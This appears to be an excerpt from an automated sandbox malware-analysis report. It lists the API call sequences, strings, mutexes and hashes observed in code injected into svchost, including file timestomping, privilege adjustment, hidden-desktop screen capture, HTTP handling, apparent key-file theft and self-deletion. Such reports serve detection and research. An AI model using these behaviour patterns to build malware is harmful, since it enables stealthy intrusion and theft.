                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DirectoryErrorLastPath$AdminBackslashCreateCurrentFolderMakeSystemUser
                                                                                                                                                                                                              • String ID: 8A99A277$keys.zip
                                                                                                                                                                                                              • API String ID: 4256651433-3737454241
                                                                                                                                                                                                              • Opcode ID: 49749447260084eb8988bbb495c2f40b87da6f1ad9e24c40277241658ddead63
                                                                                                                                                                                                              • Instruction ID: 8046a9a38479fb1c07b446d94d9ae4e2ff7594961599f63c9f1a6d4da7dd1c38
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 49749447260084eb8988bbb495c2f40b87da6f1ad9e24c40277241658ddead63
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DC21D6709003595BDB158B389C6CAFF7BE8AF55301F548698ED86C7300EB70C998CB90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNEL32(\\?\globalroot\systemroot\system32\drivers\ntfs.sys,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000,?,?,?,?,?,00402CA7,?), ref: 00401C05
                                                                                                                                                                                                              • GetFileTime.KERNEL32(00000000,?,?,00402CA7,?,?,?,?,?,00402CA7,?,?,?), ref: 00401C1F
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,?,?,00402CA7,?), ref: 00401C35
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00402CA7,?), ref: 00401C46
                                                                                                                                                                                                              • CreateFileA.KERNEL32(00000000,C0000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,?,00402CA7,?), ref: 00401C62
                                                                                                                                                                                                              • SetFileTime.KERNEL32(00000000,?,?,00402CA7,?,?,?,?,?,00402CA7,?), ref: 00401C78
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,?,?,00402CA7,?), ref: 00401C8E
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00402CA7,?), ref: 00401C9F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • \\?\globalroot\systemroot\system32\drivers\ntfs.sys, xrefs: 00401C00
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2599802364.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2599802364.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileHandle$CloseCreateInformationTime
                                                                                                                                                                                                              • String ID: \\?\globalroot\systemroot\system32\drivers\ntfs.sys
                                                                                                                                                                                                              • API String ID: 1046229350-2760794270
                                                                                                                                                                                                              • Opcode ID: 7c78bbbd609582fa450ae599ee540afb2fc557391311a346b79caf6ae330784a
                                                                                                                                                                                                              • Instruction ID: 0895f171d82555aaaa5436e0262d4f4d844cfaf0768df501368bcb823c663742
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7c78bbbd609582fa450ae599ee540afb2fc557391311a346b79caf6ae330784a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AE21F9729452187BF7219B50DD09FEF7B6CAF44710F148226FF01B61D0D778964586AC
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GlobalFindAtomA.KERNEL32(Wed Jul 6 06:49:26 20112,?,?,00402E9C), ref: 004028D9
                                                                                                                                                                                                              • GlobalAddAtomA.KERNEL32(Wed Jul 6 06:49:26 20112), ref: 004028EA
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 004028F6
                                                                                                                                                                                                              • RtlAdjustPrivilege.NTDLL(00000014,00000001,00000000,?), ref: 00402906
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 0040290C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2599802364.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2599802364.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AdminAtomGlobalUser$AdjustFindPrivilege
                                                                                                                                                                                                              • String ID: PnSw$Wed Jul 6 06:49:26 20112$explorer.exe$winlogon.exe
                                                                                                                                                                                                              • API String ID: 3001685711-2911081799
                                                                                                                                                                                                              • Opcode ID: 83ac0b8a74455aed3f9fe13c08d3b3a7fcb0d139d0bb709980968f6615d0e93a
                                                                                                                                                                                                              • Instruction ID: 2c3c2cb6c74497f887580688acf30243e480456bbc90e7420e586ff1c8abd763
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 83ac0b8a74455aed3f9fe13c08d3b3a7fcb0d139d0bb709980968f6615d0e93a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3FF012B07542196AEA1067A1AE0AB5B3A5CDB84790F404177BF04F61D0DAB99C0185FD
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}), ref: 026632DC
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 026632E5
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 026632F9
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0266330B
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8A99A277), ref: 02663316
                                                                                                                                                                                                              • Sleep.KERNEL32(00009C40,8A99A277,RFK), ref: 02663330
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 02663336
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
                                                                                                                                                                                                              • String ID: 8A99A277$Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}$RFK
                                                                                                                                                                                                              • API String ID: 4280258085-1512082180
                                                                                                                                                                                                              • Opcode ID: dca82a606211227b5bd707e6a402190f0aaecb0b678ffd630aafba2fac2ca3fd
                                                                                                                                                                                                              • Instruction ID: 300f6559f900d6d9c2de45931cf7eb13ff35293f23f31e0770b71a71caa89d6d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: dca82a606211227b5bd707e6a402190f0aaecb0b678ffd630aafba2fac2ca3fd
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F7F0E270AC53407AF32067A08C0AB6E7B986F48F04F844505FA07A1240DFA084618AA2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}), ref: 0265B91C
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 0265B925
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 0265B939
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0265B94B
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8a99a6dd), ref: 0265B956
                                                                                                                                                                                                              • Sleep.KERNEL32(00009C40,8a99a6dd,ALPHA), ref: 0265B970
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 0265B976
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
                                                                                                                                                                                                              • String ID: 8a99a6dd$ALPHA$Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
                                                                                                                                                                                                              • API String ID: 4280258085-1784723349
                                                                                                                                                                                                              • Opcode ID: 8e8e0e8297d7e01a717814e4e204714566c51a4b5380abc91fa2fadaae2b0e4b
                                                                                                                                                                                                              • Instruction ID: 6a009dcbddeecf688cc01d2af33dc4e583aed3d4fa884db1cf4f2ad65971a41a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8e8e0e8297d7e01a717814e4e204714566c51a4b5380abc91fa2fadaae2b0e4b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6EF0A7306CA3217BFB216B608C1AB5E77E8AF0AB0DF454504FD47A1384DBF090118BAB
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,00000000), ref: 0264FCCA
                                                                                                                                                                                                              • memcpy.MSVCRT(00000000,?,?,?,?,?,00001100,?,?,?,?,?,?,?,?,?), ref: 0264FD7A
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 0264FD96
                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,?), ref: 0264FDA5
                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,?,?,?,Content-Length,?), ref: 0264FDFC
                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?), ref: 0264FE1D
                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,?), ref: 0264FE9F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memcpy$_snprintf
                                                                                                                                                                                                              • String ID: 0$%x$Content-Length
                                                                                                                                                                                                              • API String ID: 4125937431-3838797520
                                                                                                                                                                                                              • Opcode ID: bfd029986c69a3ac299e2db55750440c8e38836f841f193ebe68f80e4a67f7e3
                                                                                                                                                                                                              • Instruction ID: 516b05f7bb9f5aef524eb91e561a1e2ff1f6060d8087b82664bb53dabb82e954
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bfd029986c69a3ac299e2db55750440c8e38836f841f193ebe68f80e4a67f7e3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D2918372A00706AFC714DF68D88096BB7A9FF88324B044B1DF95987B41DB30E954CBE5
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0264B843
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 0264B870
                                                                                                                                                                                                              • IsWindow.USER32(?), ref: 0264B877
                                                                                                                                                                                                              • SendMessageA.USER32(?,00000215,00000000,00000000), ref: 0264B889
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0264B898
                                                                                                                                                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 0264B8A2
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0264B8B4
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 0264B8E1
                                                                                                                                                                                                              • IsWindow.USER32(?), ref: 0264B8E8
                                                                                                                                                                                                              • SendMessageA.USER32(?,00000215,00000000,?), ref: 0264B8FB
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$MessageMutexObjectReleaseSendSingleThreadWait$CurrentProcess
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2596333622-0
                                                                                                                                                                                                              • Opcode ID: 340c5ddc7821d72e78436f79621a2cf91f0ba00bbbe360022c61047c4def795b
                                                                                                                                                                                                              • Instruction ID: 802fefb99034fbb3939d78162a517d7ae83548d6c7a775098319df40388f8d52
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 340c5ddc7821d72e78436f79621a2cf91f0ba00bbbe360022c61047c4def795b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9F21D371A81110BFC3108F65EC4CEAEBBE8EB49731B455A76F506D7290CBB184A1CBA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0269D19C), ref: 02664297
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0269D19C,?,?), ref: 02664329
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF7722F-8989-4fe1-977D-95CD777C0214},?,?), ref: 026643B5
                                                                                                                                                                                                                • Part of subcall function 026659D0: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 026659EE
                                                                                                                                                                                                                • Part of subcall function 026659D0: GetSecurityDescriptorSacl.ADVAPI32(?,?,00000001,02645DE8,?,?,02645DE8,?,00000001), ref: 02665A0B
                                                                                                                                                                                                                • Part of subcall function 026659D0: SetNamedSecurityInfoA.ADVAPI32(?,02645DE8,00000010,00000000,00000000,00000000,00000001), ref: 02665A26
                                                                                                                                                                                                                • Part of subcall function 026659D0: LocalFree.KERNEL32(?,?,?,02645DE8,?,00000001), ref: 02665A37
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8,Local\{EAF7722F-8989-4fe1-977D-95CD777C0214},00000006), ref: 026643D2
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 026643D9
                                                                                                                                                                                                                • Part of subcall function 02647310: GetHandleInformation.KERNEL32(?,00000000), ref: 02647324
                                                                                                                                                                                                                • Part of subcall function 02647310: CloseHandle.KERNEL32(?), ref: 02647335
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Security$Descriptor$BackslashHandleMutexPath$CloseConvertCreateFreeInfoInformationLocalNamedReleaseSaclSleepString
                                                                                                                                                                                                              • String ID: Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}$keys.zip$path.txt
                                                                                                                                                                                                              • API String ID: 2697826820-558722157
                                                                                                                                                                                                              • Opcode ID: 5c19a7a1ed6b0e709b9ecd2ac995cf761d4bee0658123ed2d5fbfff6376de192
                                                                                                                                                                                                              • Instruction ID: 25f7ccc4fdebc426800f99f01018c583fba724cb15af403d49b56b70c499c521
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5c19a7a1ed6b0e709b9ecd2ac995cf761d4bee0658123ed2d5fbfff6376de192
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E7412E319447495FCB2BDB28A8687FE7BE5AF4A300F1846D5D98AD7300DF619988C780
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\private\), ref: 0265C139
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,0265C0E0,00000000,00000000,00000000), ref: 0265C186
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\public\), ref: 0265C19E
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,0265C0C0,00000000,00000000,00000000), ref: 0265C1E2
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 0265C1FA
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0265C20B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateHandleThread$CloseInformation
                                                                                                                                                                                                              • String ID: \private\$\public\
                                                                                                                                                                                                              • API String ID: 677819612-281496920
                                                                                                                                                                                                              • Opcode ID: a543792f51909269ab6ae66ffa2d45f7637e9cfb8991c2761547d2976a56a1c9
                                                                                                                                                                                                              • Instruction ID: 2f67fa1ab0c39f458953eb0a4596a889c518822173d7a242393ce14edc0e4283
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a543792f51909269ab6ae66ffa2d45f7637e9cfb8991c2761547d2976a56a1c9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BA310430AC1375ABE7314EA8DC59B5E3798AB09F4CF145216ED016A3C0CBB698C1CBA4
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetWindowLongA.USER32(0264CE3A,000000F0), ref: 0264E26B
                                                                                                                                                                                                              • GetLastActivePopup.USER32(0264CE3A), ref: 0264E279
                                                                                                                                                                                                              • GetWindow.USER32(00000000,00000005), ref: 0264E293
                                                                                                                                                                                                              • GetWindow.USER32(00000000), ref: 0264E296
                                                                                                                                                                                                              • GetWindowInfo.USER32(00000000,?), ref: 0264E2AC
                                                                                                                                                                                                              • GetWindow.USER32(00000000,00000004), ref: 0264E2B5
                                                                                                                                                                                                              • GetWindow.USER32(00000000,00000003), ref: 0264E2EE
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
• Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$ActiveInfoLastLongPopup
                                                                                                                                                                                                              • String ID: <
                                                                                                                                                                                                              • API String ID: 3748940024-4251816714
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • StrCmpNIA.SHLWAPI(00000001,?,00000000,HTTP/1.,00000007,?,0264FCE7,00000000,?,0264FCE7,,-04D1F5C8,00000000,00000000,0264FCE7,?), ref: 0264F0CD
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
• Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: $Connection$Content-Length$HTTP/1.$Proxy-Connection$Transfer-Encoding$chunked$close
                                                                                                                                                                                                              • API String ID: 0-1412996494
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WindowFromDC.USER32(?), ref: 0264C31C
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0264C354
                                                                                                                                                                                                              • CreateRectRgn.GDI32(00000001,00000001,00000001,00000001), ref: 0264C362
                                                                                                                                                                                                              • GetClipRgn.GDI32(?,00000000), ref: 0264C36C
                                                                                                                                                                                                              • SelectClipRgn.GDI32(00000000,00000000), ref: 0264C37C
                                                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 0264C383
                                                                                                                                                                                                              • GetViewportOrgEx.GDI32(?,?), ref: 0264C38E
                                                                                                                                                                                                              • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0264C3A2
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 0264C3E3
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
• Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ClipObjectViewport$CreateDeleteFromMutexRectReleaseSelectSingleWaitWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3315380975-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(00401CB0,?,0000001C), ref: 004012DF
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 004012F5
                                                                                                                                                                                                              • PathFileExistsA.SHLWAPI(?), ref: 00401302
                                                                                                                                                                                                              • GetTempPathA.KERNEL32(00000104,?,00000000), ref: 00401319
                                                                                                                                                                                                              • GetTempFileNameA.KERNEL32(?,00000000,00000000,?), ref: 00401331
                                                                                                                                                                                                              • MoveFileExA.KERNEL32(?,?,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0040134D
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 0040135C
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 00401369
                                                                                                                                                                                                              • MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 0040137D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2599802364.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2599802364.000000000045E000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$MoveNamePathTemp$AttributesDeleteExistsModuleQueryVirtual
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2787354276-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetThreadDesktop.USER32(?), ref: 02649350
                                                                                                                                                                                                                • Part of subcall function 02648F20: SelectObject.GDI32(00000000,00000000), ref: 02648F3A
                                                                                                                                                                                                                • Part of subcall function 02648F20: DeleteObject.GDI32(00000000), ref: 02648F49
                                                                                                                                                                                                                • Part of subcall function 02648F20: DeleteDC.GDI32(00000000), ref: 02648F57
                                                                                                                                                                                                                • Part of subcall function 02648F20: SelectObject.GDI32(?,00000000), ref: 02648F67
                                                                                                                                                                                                                • Part of subcall function 02648F20: DeleteObject.GDI32(00000000), ref: 02648F6F
                                                                                                                                                                                                                • Part of subcall function 02648F20: DeleteDC.GDI32(?), ref: 02648F78
                                                                                                                                                                                                                • Part of subcall function 02648F20: GetDC.USER32(00000000), ref: 02648F7C
                                                                                                                                                                                                                • Part of subcall function 02648F20: CreateCompatibleDC.GDI32(00000000), ref: 02648F8B
                                                                                                                                                                                                                • Part of subcall function 02648F20: CreateCompatibleDC.GDI32(00000000), ref: 02648F93
                                                                                                                                                                                                                • Part of subcall function 02648F20: CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 02648FB4
                                                                                                                                                                                                                • Part of subcall function 02648F20: SelectObject.GDI32(?,00000000), ref: 02648FC3
                                                                                                                                                                                                                • Part of subcall function 02648F20: CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 02648FDE
                                                                                                                                                                                                                • Part of subcall function 02648F20: SelectObject.GDI32(00000000,00000000), ref: 02648FFD
                                                                                                                                                                                                                • Part of subcall function 02648F20: ReleaseDC.USER32(00000000,00000000), ref: 0264900C
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000001F4), ref: 0264937C
                                                                                                                                                                                                              • GetTopWindow.USER32(00000000), ref: 0264938B
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0264939E
                                                                                                                                                                                                              • GetWindow.USER32(00000000,00000005), ref: 026493B4
                                                                                                                                                                                                              • GetWindow.USER32(00000000), ref: 026493B7
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000,00000000), ref: 026493C6
                                                                                                                                                                                                              • SetEvent.KERNEL32(00000000), ref: 026493CF
                                                                                                                                                                                                              • Sleep.KERNEL32(00000032), ref: 026493DB
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
• Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Object$CompatibleCreateDeleteSelect$Window$BitmapReleaseSingleWait$DesktopEventMutexSleepThread
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4064958368-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00402FF7
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000300,004036DE,75B8E610,00402FDE), ref: 0040300F
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 00403012
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000300), ref: 0040301F
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00403022
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,004036DE,004036DE,75B8E610,00402FDE), ref: 0040302B
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 0040302E
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,004036DE), ref: 0040303B
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0040303E
                                                                                                                                                                                                              Memory Dump Source
